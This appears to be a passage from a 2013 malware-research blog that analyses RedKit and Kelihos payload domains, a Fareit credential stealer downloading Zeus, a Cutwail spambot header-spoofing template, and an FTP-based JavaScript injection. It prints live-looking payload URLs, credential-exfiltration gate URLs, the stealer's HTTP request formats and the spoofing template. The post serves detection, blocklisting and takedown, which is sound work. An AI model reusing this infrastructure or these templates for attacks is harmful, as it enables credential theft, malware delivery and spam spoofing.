If we see it carefully in below marked parts there was a modification:

As per previously explained it used the mixed hex character to replace the real value, but it added string splitting of the hex characters as per seen in line 5. And also noted in the line 32, the condition combined with the hex and integer (0x19==031) and also the subtraction operation of hex with integer stored variable "bv".

Just change the value as per noted with the green color and you can decode into any tools you prefer. PS for spider monkey or rhino simulator this code will run without problem and storing the result instantly.

Below is the decoding result:

4. Method of hiding the "split", a trap & changing hex places

Got another wave of infection coming one of them has this changing, is just like the malware moronz and I are playing a kind of CTF now, OK let's see who will win in the end.. The infected page is up for the research/check purpose:

The code is as per below "format" and the modification spotted I marked as per below in colour. I checked my team's work on these and the common mistakes this time went into the un-necessary changes for the var which is not a hex, here we go:

Well of course after the codes are adjusted you can decode it in anyway you want as per below:
I have a feeling this "note" of changing will be a loong list :-) So be it!

#MalwareMustDie!

Friday, July 19, 2013

#Alert - Kelihos payload download zone in .RU 93 domains still ALIVE - RedKit EK #malware distribution!

We detected massive infection of RedKit in Japan as per posted by our Japanese team here -->>[0day.jp]
The Red Kit attack was targeting innocent popular sites like site of happiness relation of mother and child and the office document navigation as per snapshot below (we detected 54 sites of 214 urls are infected): And after cracking the exploit code we found these are the payload used:

and

We always urge the our team to post the infection url into URLquery for the sorting 6 PoC purpose, so does this case, the total URL grepped in two days ago are:
// grep rasta*
 
0 / 3 [7]hxxp://131.155.81.158/rasta01.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/rasta01.exe Belarus 93.125.67.95
0 / 0 [9]hxxp://www.philchor-nb.de/demo/rasta01.exe Germany
0 / 2 [10]hxxp://ikqydkod.ru/rasta01.exe Ukraine 109.251.141.23
0 / 2 [11]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Russian Federation
0 / 6 [12]hxxp://bopefidi.ru/rasta01.exe Russian Federation 2.94.27.238
0 / 2 [13]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://sojouvyc.ru/rasta01.exe Ukraine 31.128.74.7
0 / 2 [15]hxxp://vadlubiq.ru/rasta01.exe Ukraine 109.162.84.6
0 / 2 [16]hxxp://kazlyjva.ru/rasta01.exe Malaysia 58.26.182.98
0 / 2 [17]hxxp://funfubap.ru/rasta01.exe Taiwan 114.35.239.185
0 / 2 [18]hxxp://goryzcob.ru/rasta01.exe Ukraine 109.87.254.247
0 / 2 [19]hxxp://motbajsi.ru/rasta01.exe Ukraine 91.196.61.56
0 / 6 [20]hxxp://xymkapaq.ru/rasta01.exe Latvia 89.201.53.86
0 / 2 [21]hxxp://hupjiwuc.ru/rasta01.exe Ukraine 195.114.156.254
0 / 6 [22]hxxp://runevfoh.ru/rasta01.exe Ukraine 5.248.34.57
0 / 2 [23]hxxp://virerceb.ru/rasta01.exe Argentina 190.227.181.203
0 / 6 [24]hxxp://xatzyjha.ru/rasta01.exe Taiwan 1.172.233.239
0 / 2 [25]hxxp://makgivus.ru/rasta01.exe Canada 99.250.218.131
0 / 2 [26]hxxp://avryjpet.ru/rasta01.exe Belarus 91.215.178.83
0 / 2 [27]hxxp://kyjaqcoz.ru/rasta01.exe Ukraine 213.231.52.44
0 / 2 [28]hxxp://bopefidi.ru/rasta01.exe Taiwan 111.255.72.1
0 / 6 [29]hxxp://ycsycxyd.ru/rasta01.exe Japan 118.104.77.165
0 / 2 [30]hxxp://gazgowry.ru/rasta01.exe Ukraine 77.122.55.112
0 / 2 [31]hxxp://vetarwep.ru/rasta01.exe Kazakhstan 176.222.169.243
0 / 6 [32]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Bulgaria 95.43.87.30
0 / 6 [33]hxxp://gulaxxax.ru/rasta01.exe Ukraine 31.42.69.61
0 / 6 [34]hxxp://onhugxic.ru/rasta01.exe Kazakhstan 109.239.45.48
0 / 2 [35]hxxp://ahfamzyk.ru/rasta01.exe Ukraine 178.150.33.194
0 / 6 [36]hxxp://sykevked.ru/rasta01.exe Ukraine 151.0.44.52
0 / 6 [37]hxxp://ydhicdor.ru/rasta01.exe Ukraine 78.30.249.126
0 / 1 [38]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.87.7.53
0 / 2 [39]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 188.231.173.99
0 / 6 [40]hxxp://kifectah.ru/rasta01.exe Japan 61.27.109.166
0 / 2 [41]hxxp://busasxyv.ru/rasta01.exe Belarus 37.215.87.61
0 / 6 [42]hxxp://yjnaqwew.ru/rasta01.exe Ukraine 93.77.96.252
0 / 6 [43]hxxp://xuktalez.ru/rasta01.exe Ukraine 176.106.211.135
0 / 2 [44]hxxp://ybtoptag.ru/rasta01.exe Latvia 89.191.110.59
0 / 2 [45]hxxp://lygyucce.ru/rasta01.exe Ukraine 94.178.78.102
0 / 6 [46]hxxp://taykenid.ru/rasta01.exe Ukraine 212.92.227.111
0 / 2 [47]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.251.2.33
0 / 6 [48]hxxp://taykenid.ru/rasta01.exe Ukraine 176.8.183.90
0 / 2 [49]hxxp://qeisybyg.ru/rasta01.exe Ukraine 77.87.156.180
0 / 2 [50]hxxp://bysjyhuf.ru/rasta01.exe Taiwan 1.173.164.63
0 / 6 [51]hxxp://najniner.ru/rasta01.exe Taiwan 114.40.130.52
0 / 4 [52]hxxp://193.105.134.189/rasta01.exe Sweden 193.105.134.189
0 / 6 [53]hxxp://dakacdyn.ru/rasta01.exe Ukraine 178.158.82.158
0 / 6 [54]hxxp://higrikpy.ru/rasta01.exe Belgium 85.26.38.155
0 / 2 [55]hxxp://dipteqna.ru/rasta01.exe Ukraine 109.87.32.180
0 / 6 [56]hxxp://kykywpik.ru/rasta01.exe Ukraine 5.1.13.86
0 / 2 [57]hxxp://cimmitic.ru/rasta01.exe Japan 118.237.85.238
0 / 2 [58]hxxp://ybtoptag.ru/rasta01.exe Belarus 91.215.178.235
0 / 6 [59]hxxp://suyzerew.ru/rasta01.exe Kazakhstan 178.91.37.180
0 / 6 [60]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 93.77.68.69
0 / 2 [61]hxxp://ynhazcel.ru/rasta01.exe Kazakhstan 2.133.226.218
0 / 6 [62]hxxp://aflyzkac.ru/rasta01.exe Ukraine 93.77.28.43
0 / 2 [63]hxxp://giktyxvu.ru/rasta01.exe Ukraine 188.190.42.32
0 / 4 [64]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 2 [65]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine 31.133.38.207
0 / 2 [66]hxxp://aflyzkac.ru/rasta01.exe Japan 210.148.165.67
0 / 6 [67]hxxp://giktyxvu.ru/rasta01.exe Ukraine 178.159.231.99
0 / 6 [68]hxxp://ybtoptag.ru/rasta01.exe Ukraine 89.252.33.161
0 / 6 [69]hxxp://dyvgigim.ru/rasta01.exe Ukraine 37.229.35.234
0 / 4 [70]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 6 [71]hxxp://jehrecyp.ru/rasta01.exe Ukraine 188.230.9.64
0 / 2 [72]hxxp://aro0eq.hozfezbe.ru/rasta01.exe[/code] Ukraine
0 / 6 [73]hxxp://cyrkapov.ru/rasta01.exe Ukraine 176.8.183.90
0 / 6 [74]hxxp://niqtasoz.ru/rasta01.exe Ukraine 46.172.147.122
0 / 2 [75]hxxp://ginkyvub.ru/rasta01.exe Ukraine 93.77.84.22
0 / 2 [76]hxxp://tejjetzo.ru/rasta01.exe Moldova, Republic of
0 / 6 [77]hxxp://fafehwiz.ru/rasta01.exe Ukraine 178.150.115.215
0 / 2 [78]hxxp://yhzelbyp.ru/rasta01.exe Ukraine 37.57.24.238
0 / 2 [79]hxxp://ihurvyun.ru/rasta01.exe Ukraine 178.158.198.249
0 / 6 [80]hxxp://adtyuhuz.ru/rasta01.exe Russian Federation 128.73.7.18
0 / 2 [81]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Hong Kong 118.141.33.46
0 / 6 [82]hxxp://jehrecyp.ru/rasta01.exe Ukraine 91.200.138.241
0 / 7 [83]hxxp://tejjetzo.ru/rasta01.exe Ukraine 94.153.63.166
0 / 3 [84]hxxp://fafehwiz.ru/rasta01.exe Ukraine 81.163.152.32
0 / 3 [85]hxxp://yhzelbyp.ru/rasta01.exe Chile 186.36.204.152
0 / 7 [86]hxxp://adtyuhuz.ru/rasta01.exe Argentina 190.107.122.36
0 / 7 [87]hxxp://aggaxsef.ru/rasta01.exe Taiwan 1.173.221.95
0 / 3 [88]hxxp://bomuxvis.ru/rasta01.exe Taiwan 1.172.231.167
0 / 7 [89]hxxp://jehrecyp.ru/rasta01.exe Ukraine 178.150.57.167
0 / 7 [90]hxxp://xejabfom.ru/rasta01.exe Belarus 176.118.159.88
0 / 3 [91]hxxp://sapigrys.ru/rasta01.exe Ukraine 93.77.97.98
0 / 3 [92]hxxp://sodkanxo.ru/rasta01.exe Ukraine 77.122.55.156
0 / 7 [93]hxxp://aggaxsef.ru/rasta01.exe Ukraine 178.150.169.180
0 / 3 [94]hxxp://fafehwiz.ru/rasta01.exe Ukraine 89.162.163.66
0 / 3 [95]hxxp://zyvjofat.ru/rasta01.exe Taiwan 36.239.213.101
0 / 2 [96]hxxp://paxgeqjo.ru/rasta01.exe Israel 46.121.221.173
0 / 6 [97]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.95.246
0 / 2 [98]hxxp://hiznizoc.ru/rasta01.exe Korea, Republic of
0 / 2 [99]hxxp://lysopzoh.ru/rasta01.exe Ukraine 46.118.218.45
0 / 2 [100]hxxp://zyvjofat.ru/rasta01.exe Ukraine 178.150.192.214
0 / 2 [101]hxxp://xoqhozaz.ru/rasta01.exe Ukraine 109.162.96.64
0 / 2 [102]hxxp://hiznizoc.ru/rasta01.exe Ukraine 176.112.20.187
0 / 6 [103]hxxp://lysopzoh.ru/rasta01.exe Ukraine 93.175.234.62
0 / 6 [104]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.227.0
0 / 6 [105]hxxp://pywudcoz.ru/rasta01.exe Japan 180.14.61.59
0 / 6 [106]hxxp://izytexuf.ru/rasta01.exe Taiwan 123.194.247.85
0 / 6 [107]hxxp://izytexuf.ru/rasta01.exe Kazakhstan 2.132.145.189
0 / 6 [108]hxxp://usfezhyk.ru/rasta01.exe Ukraine 176.98.15.73
0 / 6 [109]hxxp://hipahsah.ru/rasta01.exe Belarus 134.17.112.99
0 / 6 [110]hxxp://talozzum.ru/rasta01.exe Ukraine 93.78.126.109
0 / 6 [111]hxxp://yrupxyen.ru/rasta01.exe Ukraine 5.105.21.178
0 / 6 [112]hxxp://nacwoman.ru/rasta01.exe Ukraine 109.251.74.37
0 / 2 [113]hxxp://libcikak.ru/rasta01.exe Japan 219.102.110.98
0 / 6 [114]hxxp://uphinjaq.ru/rasta01.exe Ukraine 151.0.5.20
0 / 6 [115]hxxp://aziwolge.ru/rasta01.exe Ukraine 151.0.38.74
0 / 6 [116]hxxp://kosnutef.ru/rasta01.exe Ukraine 93.79.38.73
0 / 6 [117]hxxp://kiyvryhy.ru/rasta01.exe Ukraine 80.77.44.150
0 / 2 [118]hxxp://oktizsez.ru/rasta01.exe Ukraine 91.227.207.89
0 / 6 [119]hxxp://uphinjaq.ru/rasta01.exe Ukraine 31.170.137.75
0 / 6 [120]hxxp://xaplovav.ru/rasta01.exe Ukraine 93.79.113.101
0 / 6 [121]hxxp://aziwolge.ru/rasta01.exe Ukraine 93.79.2.115
0 / 6 [122]hxxp://uphinjaq.ru/rasta01.exe Taiwan 114.25.156.106
0 / 6 [123]hxxp://xaplovav.ru/rasta01.exe Japan 123.225.106.205
0 / 6 [124]hxxp://oktizsez.ru/rasta01.exe Taiwan 111.252.191.134
0 / 6 [125]hxxp://kiyvryhy.ru/rasta01.exe Taiwan 124.11.195.73
0 / 2 [126]hxxp://sisvizub.ru/rasta01.exe Belarus 178.124.179.118
0 / 2 [127]hxxp://lymimnib.ru/rasta01.exe Ukraine 37.229.38.92
0 / 6 [128]hxxp://fugegwyf.ru/rasta01.exe Ukraine 159.224.94.242
0 / 2 [129]hxxp://fugegwyf.ru/rasta01.exe Russian Federation
0 / 2 [130]hxxp://urxibzep.ru/rasta01.exe Latvia 79.135.142.166
0 / 6 [131]hxxp://cibowjuv.ru/rasta01.exe Japan 219.173.80.25
0 / 6 [132]hxxp://pedtokid.ru/rasta01.exe Ukraine 188.231.173.99
0 / 2 [133]hxxp://bawoxgud.ru/rasta01.exe Ukraine 188.231.173.99
 
// grep userid*
 
0 / 3 [7]hxxp://131.155.81.158/userid2.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/userid2.exe Ukraine 89.252.33.161
0 / 2 [9]hxxp://ikqydkod.ru/userid2.exe Ukraine 178.137.38.18
0 / 1 [10]hxxp://ikqydkod.ru/ruserid2.exe Ukraine 176.8.183.137
0 / 6 [11]hxxp://xudsahbu.ru/userid2.exe Colombia 186.99.248.89
0 / 6 [12]hxxp://dypqysro.ru/userid2.exe Ukraine 212.79.121.221
0 / 6 [13]hxxp://uhipyvob.ru/userid2.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://jyuhysdo.ru/userid2.exe Ukraine 46.119.129.244
0 / 6 [15]hxxp://runevfoh.ru/userid2.exe Ukraine 46.211.249.42
0 / 6 [16]hxxp://hupjiwuc.ru/userid2.exe Ukraine 78.30.193.176
0 / 7 [17]hxxp://busasxyv.ru/userid2.exe Russian Federation 2.94.27.238
0 / 6 [18]hxxp://cypseguv.ru/userid2.exe Taiwan 124.12.91.243
0 / 3 [19]hxxp://78.83.177.242/userid2.exe Bulgaria 78.83.177.242
0 / 7 [20]hxxp://runevfoh.ru/userid2.exe Japan 123.176.141.183
0 / 6 [21]hxxp://confikja.ru/userid2.exe Ukraine 212.2.153.131
0 / 6 [22]hxxp://runevfoh.ru/userid2.exe Belarus 93.191.99.97
0 / 6 [23]hxxp://confikja.ru/userid2.exe Belarus 37.215.114.92
0 / 2 [24]hxxp://confikja.ru/userid2.exe Ukraine 109.87.181.75
0 / 6 [25]hxxp://tofhermi.ru/userid2.exe Ukraine 109.87.83.108
0 / 1 [26]hxxp://fafehwiz.ru/userid1.exe Ukraine 178.151.63.5
0 / 6 [27]hxxp://ybtoptag.ru/userid2.exe Ukraine 94.153.63.166
0 / 2 [28]hxxp://qeisybyg.ru/userid2.exe Russian Federation
0 / 2 [29]hxxp://mihumcuf.ru/userid2.exe Ukraine 77.122.68.176
0 / 1 [30]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.154.33.114
0 / 1 [31]hxxp://ollopdub.ru/userid1.exe Taiwan 114.27.25.145
0 / 1 [32]hxxp://fafehwiz.ru/userid1.exe Ukraine 159.224.8.181
0 / 1 [33]hxxp://ollopdub.ru/userid1.exe Ukraine 92.52.177.41
0 / 1 [34]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.45.106.206
0 / 1 [35]hxxp://ollopdub.ru/userid1.exe Ukraine 109.162.41.226
0 / 1 [36]hxxp://fafehwiz.ru/userid1.exe India 49.206.161.32
0 / 1 [37]hxxp://pywudcoz.ru/userid1.exe Ukraine 93.78.79.28
0 / 1 [38]hxxp://ollopdub.ru/userid1.exe Hong Kong 223.19.195.162
0 / 1 [39]hxxp://ollopdub.ru/userid1.exe Ukraine 46.185.34.216
0 / 1 [40]hxxp://pywudcoz.ru/userid1.exe Russian Federation
0 / 1 [41]hxxp://hiznizoc.ru/userid1.exe Ukraine 87.244.169.104
0 / 1 [42]hxxp://ollopdub.ru/userid1.exe Macedonia 146.255.91.19
0 / 1 [43]hxxp://hiznizoc.ru/userid1.exe Ukraine 176.36.152.60
0 / 1 [44]hxxp://ollopdub.ru/userid1.exe Ukraine 37.143.93.132
0 / 1 [45]hxxp://kosnutef.ru/userid1.exe Ukraine 176.111.35.196
0 / 6 [46]hxxp://acaqizwy.ru/userid1.exe Taiwan 61.227.163.213
0 / 2 [47]hxxp://lymimnib.ru/userid1.exe Ukraine 176.103.208.105
0 / 2 [48]hxxp://sisvizub.ru/userid1.exe Ukraine 178.150.212.143
0 / 3 [49]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [50]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [51]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 2 [52]hxxp://ankoweco.ru/userid1.exe Poland 79.135.180.94
0 / 2 [53]hxxp://uxmadjox.ru/userid1.exe Poland 86.63.98.141
Of course we issued the request for immediate shutdown for these payload domains, which is 97 in total (so far.. maybe more.. please inform us if you find more). But it looks like until this moment this post is written only four domains got shutdown and 93 of them are still up and alive as per below list of DGA .RU domains and IP used:
uhipyvob.ru,178.150.17.118,
ollopdub.ru,176.8.3.144,
fafehwiz.ru,91.217.58.74,
fuhxodyz.ru,77.122.197.86,
ikqydkod.ru,37.229.144.253,
bopefidi.ru,118.34.132.154,
ycsycxyd.ru,95.140.214.250,
sojouvyc.ru,188.129.218.87,
vadlubiq.ru,178.93.135.94,
kazlyjva.ru,109.162.94.114,
funfubap.ru,213.37.166.193,
goryzcob.ru,213.37.166.193,
motbajsi.ru,178.158.158.182,
xymkapaq.ru,93.185.219.213,
runevfoh.ru,89.215.115.4,
virerceb.ru,94.153.36.164,
xatzyjha.ru,93.79.152.211,
makgivus.ru,79.135.211.87,
avryjpet.ru,178.211.105.168,
kyjaqcoz.ru,46.119.144.106,
hiznizoc.ru,46.250.7.179,
giktyxvu.ru,77.123.79.211,
ynhazcel.ru,178.172.246.30,
gazgowry.ru,93.89.208.202,
vetarwep.ru,5.248.164.41,
gulaxxax.ru,46.119.144.106,
onhugxic.ru,109.251.126.26,
ahfamzyk.ru,46.49.47.254,
sykevked.ru,93.77.96.252,
ydhicdor.ru,94.137.172.44,
kifectah.ru,109.122.40.111,
busasxyv.ru,77.121.199.73,
yjnaqwew.ru,77.121.255.183,
xuktalez.ru,91.123.150.115,
lygyucce.ru,94.158.74.230,
taykenid.ru,109.108.252.136,
bysjyhuf.ru,5.1.22.63,
najniner.ru,126.65.174.136,
dakacdyn.ru,109.254.67.25,
higrikpy.ru,78.154.168.74,
dipteqna.ru,188.190.75.232,
kykywpik.ru,109.122.33.79,
cimmitic.ru,153.180.71.144,
suyzerew.ru,217.196.171.35,
yhzelbyp.ru,77.123.80.174,
aflyzkac.ru,93.185.220.213,
tejjetzo.ru,93.89.208.202,
lysopzoh.ru,178.168.22.114,
dyvgigim.ru,46.211.75.123,
jehrecyp.ru,87.69.55.36,
cyrkapov.ru,190.220.70.79,
niqtasoz.ru,178.150.17.118,
ginkyvub.ru,77.123.80.174,
zyvjofat.ru,93.79.152.211,
ihurvyun.ru,94.231.190.74,
izytexuf.ru,31.192.237.101,
adtyuhuz.ru,84.252.56.59,
aggaxsef.ru,94.230.201.36,
bomuxvis.ru,84.240.19.130,
xejabfom.ru,178.158.186.24,
sapigrys.ru,95.69.187.249,
sodkanxo.ru,117.197.245.69,
paxgeqjo.ru,49.205.210.193,
xoqhozaz.ru,95.160.83.57,
usfezhyk.ru,46.119.212.183,
hipahsah.ru,109.87.200.213,
talozzum.ru,31.133.52.8,
yrupxyen.ru,91.224.168.65,
nacwoman.ru,178.150.90.223,
libcikak.ru,46.119.128.115,
uphinjaq.ru,109.162.9.212,
aziwolge.ru,178.150.17.118,
oktizsez.ru,78.139.153.169,
kiyvryhy.ru,79.133.254.238,
fugegwyf.ru,188.190.75.232,
urxibzep.ru,91.225.173.12,
bawoxgud.ru,31.133.55.240,
xudsahbu.ru,195.24.155.245,
dypqysro.ru,31.170.137.75,
jyuhysdo.ru,78.154.168.74,
hupjiwuc.ru,188.121.198.247,
cypseguv.ru,176.8.249.131,
confikja.ru,93.171.77.37,
tofhermi.ru,36.224.71.20,
ybtoptag.ru,180.61.12.116,
qeisybyg.ru,77.122.124.210,
mihumcuf.ru,93.185.220.213,
pywudcoz.ru,89.201.116.227,
kosnutef.ru,79.164.250.218,
acaqizwy.ru,178.150.244.54,
lymimnib.ru,117.197.15.103,
sisvizub.ru,89.28.52.30,
hozfezbe.ru,178.210.222.205,
Since the weekend is coming and I bet the infecion is still in the wild, we urge everyone to block these .RU listed, for a precaution if we can not shut these mess down in time.

Your cooperation is highly appreciated, with thank you in advance!

#MalwareMustDie!

MMD-0002-2013 - How Cutwail and other SpamBot can fool (spoof) us?

As per title says, the answer is VERY bad and nasty. I took my bitter pill by analyzing this case, it is important for sharing this information since there are very lack of these in the internet, so I dare myself to write this analysis experience.

Yesterday we came into a spam malvertisement of login credential stealer (Trojan Win32/Fareit) which looks like sent from an infected PC in a local network of US's Department of Defense, and also looks relayed via their email sever. Below is the snapshot of the email:

And this is the written header for relaying this malvertisement:

You can see is a common spam of malware campaign, inside of the ZIP file there is an executable PE file which actually a Trojan Win32/Fareit, an FTP, FileZilla, Browser, Remote Directory, Email and Faceook's login credential stealer.

The distributed Trojan: Win32/Fareit

Well to be brief, the trojan itself runs as per the below video and downloading two Zeus variant malware files from remote host, send the grabbed our login data to a remote credential panel (we call it gates) URL, and in the end to make our PC becoming a part of Zeus botnet.

Below is some evidence I grabbed, the panel sent with credentials:

h00p://nursenextdoor.com:443/ponyb/gate.php
h00p://dreamonseniorswish.org:443/ponyb/gate.php
h00p://prospexleads.com:8080/ponyb/gate.php
h00p://phonebillssuck.com:8080/ponyb/gate.php
The POST method use to send the credential:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
The encoded posted traffic contains credentials:

The downloaded another files malware (ZeuS/Zbot) URL:
h00p://www.lavetrinadeidesideri.it/Twe.exe
h00p://ftp.aquasarnami.com/zKo.exe
And the HTTP method it used to download them:
GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s
PoC of the downloaded Zeus:

And with be saved in here by the Win32/Fareit:

↑These are Zeus malware alright. Confused a bit with the spambot and FakeAV but thank's to Xylit0l & other friend who remind me to recheck.

The overall samples and its detection ration in VT (click the MD5) is here:


2013/07/17 18:44 158,720 c7e5b822101343c1a4d8a2297a1a7d40 CommBank_Docs_18072013.exe 
2013/07/18 19:18 205,824 1427015ba8d9736e6329ea0444bb300c Twe.exe                    
2013/07/18 20:01 315,392 0ac084b9fa597c74ea1260ed054b126e zKo.exe                    

Wrote a deeper analysis of the malware attached and can be viewed here-->>[KernelMode]

How far can they spoof?

Excluding the rogue contents used in the email. It is a common practice of these scammer to spoof: (1) Sender's email address, (2) Email's message ID, (3) The mail client information or even (4) The fake MIME version used in the header (these are marked red color numbers in the below picture).

With noted: They can fake "almost" everything even like the character set used (see the blue color part), see the following explanation for this details.

If we see the email routing header used in this spam, seems like the email was relayed two times before it came to my honeypot address. Let's see the routing information clearly which I marked in the above picture in purple color highlight. The first relay (which is the lower part) looks like a client in a local network with the IP mask 192.168.8.0/24 sent this email to a reached network's MTA, in this case is: 143.214.203.103 to relay this spam to another remote MTA in 69.199.182.82 then it was relayed to my honeypot mail server to my address.

So what happen after a an unix admin or engineer after seeing this? Oh, it looks like some malware infected a client in 143.214.203.103, which after checking further is the IP 143.214.203.103 is at the US DoD's network:

OK, this was a shock and a fact that hard to believe myself, so I tweeted this as per below:

And got no response to deny this, UNTIL...

A fellow researcher (thank's to @snixerxero) contacted me for the possibility of spoofing for those email routing header. After looked back to the header again and the way it's written, I replied "No way, looks real to me, you must be wrong!", and he came with the related template of the Cutwail (Reference of Cutwail is here -->>[LINK])spambot as a PoC (with many thanks) as per I pasted below:

Received: from [{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}
{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}
{NUMBER[0-5]}] (port={NUMBER[1-9]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]} 
helo=[192.168.{DIGIT[1]}.{DIGIT[1]}{DIGIT[1]}]) by {BOT_IP} with asmtp id 
1rqLaL-000{SYMBOL[1]}{SYMBOL[1]}-00 for {MAILTO_USERNAME}@{MAILTO_DOMAIN}; {DATE}
Surprisingly THIS template match well to the values of the DoD header routing's data below:
Received: from [143.214.203.103] (port=30877 helo=[192.168.8.11]) by 69.199.182.82 with
  asmtp id 1rqLaL-0002D-00 for xxx@xxx; Wed, 17 Jul 2013 15:26:40 -0500
This information is also breaking the ice of the template code as per below details:

1. The IP addresss spoofed template:

{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}.{NUMBER[1-2]}{NUMBER[0-5]}{NUMBER[0-5]}
please see the REGEX-like values used.

2. The port number template(format):

{NUMBER[1-9]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]}{DIGIT[1]
as per IP template, noted the digit per digit used to plot this number, a good hint in reversing.

3. We came into most important part, the way this spambot fakes the email relay log ID with the below template:

by {BOT_IP} with asmtp id 1rqLaL-000{SYMBOL[1]}{SYMBOL[1]}-00 for 
This will print the fake relay log ID below:
by 69.199.182.82 with
  asmtp id 1rqLaL-0002D-00 for xxx@xxx; Wed, 17 Jul 2013 15:26:40 -0500
Which explains us that 69.199.182.82 is the ACTUAL SpamBot IP of the Cutwail and there are never bee any relay of these malvertisement in 143.214.203.103 at all.

Mitigation

By understanding the template used by the spambots, we can do many things for blocking these spambot's malvertisement in the SMTP layer. Sadly, like happen to this case, mostly are in the crypted or encoded XML and can not be seen right away. we should pay more research attention and spread to all filtration industry the discovered spam template. for another example of ANOTHER spambot template.

Recently, we had a case where we popped and exposed one of the template while we nailed a Kuluoz network in this case here -->>[PASTEBIN].

In that case we decrypted (yes.. that one was not encoded but encrypted, so we did not decoding it) the spambot template and showing the below spoof email header as per below:

↑In this case we see the spoofing of the Outlook Express email client (MUA) used. Please noted the fake character set used.

Back to our original case, in the template at the relay log ID parts, we can see the below "static" strings used:

with asmtp id 1rqLaL-000
and we know this is the unique string of template that I received (which was explained as Cutwail spambot's) template, so let's see "how many" and "what kind of spam" they altready sent us by using this template. I just grep that static strings into my spam database (is a mailbox collection I made of those botnet sent garbage to my honeypot) as per picture below:

These are the snapshots of recent ones (click to enlarge the picture) :

See the one with my name printed in the zip file?
One of the spambot template is implemented in he attachment filename, to be precise, like this one:

The above additional three samples are attached with Fareit, Fareit and Fareit.

So we know each other now (smile), and we know also WHO's crime group moronz is using WHAT and spreading WHICH malware mess now. We're getting closer to nail these scums for good. To these moronz, go and send me more of your spams! :-)

Sample

We share this information to common people and security researcher for raising the understanding & detection ratio in the SMTP methodology filtration for these threat.

I attached the samples I gain for the research purpose only by security experts in here-->>[MediaFire]

#MalwareMustDie!

Additional:
I credit the wonderful support from all fellow researchers who help this analysis and MalwareMustDie project in general, we won't make it this far without all of you.

I dedicated this writing to the incoming event of DEF CON and BlackHat 2013, I am still struggling to figure how to attend it, hopefully I can make it, God knows how much I wanted to go and meet many good friends in there (believe me), is just my health and my tight day work schedule is an obstacle to overcome.. But if I can't make it I will surely go to DerbyCon this year.

Wednesday, July 17, 2013

MMD-0001-2013 - Proof of Concept of "CookieBomb" code injection attack

This writing is actually related to the previously blogged: "A mistery of Malware URL "cnt.php" Redirection" here-->>[MMD-Blog], so I warn you.. is not new stuff, but it seems a bit difficult to make some admin to act quickly due to IR of this incident, so me and my fellow coder friend in our group tried to explain how dangerous this threat can be performed in a PoC details.

Accidentally I just handled a rush of malicious JavaScript code injections of similar cases, (without involving htaccess) and these evil code was injected to the html files which mostly are index files, with the code as per below:

This is why I have huge samples of this injection code for this research purpose.

So I collected the latest 30+ codes which I attached in the sample section for the cross analysis purpose for fellow researchers (I put different password for this sharing purpose, DM me in twitter for it):

These code was injected in the index files via FTP account (in all cases I handled) that was leaked/stolen suspected from the malware infection or by FTP bruting, or possibly by "other" vulnerabilities (which can not say it out loud yet, a different issue), with the log (thank's to the great admin who shared this) which suggesting the same auto-injection FTP tool as per previously blogged:

[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="USER xxxxxxxx" B=- S=331
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="PASS (hidden)" B=- S=230
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="SYST" B=- S=215
[2013/07/11 21:46:55] xxxxxxxx ATTACKER-IP: C="LIST /" D= B=211 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/" D= B=630 S=226
[2013/07/11 21:46:56] xxxxxxxx ATTACKER-IP: C="LIST public_html/data/" D= B=124 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="LIST public_html/images/" D= B=1219 S=226
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:57] xxxxxxxx ATTACKER-IP: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/07/11 21:46:58] xxxxxxxx ATTACKER-IP: C="STOR public_html/images/KJQb9RkC.gif" F=- B=- S=552 T=-
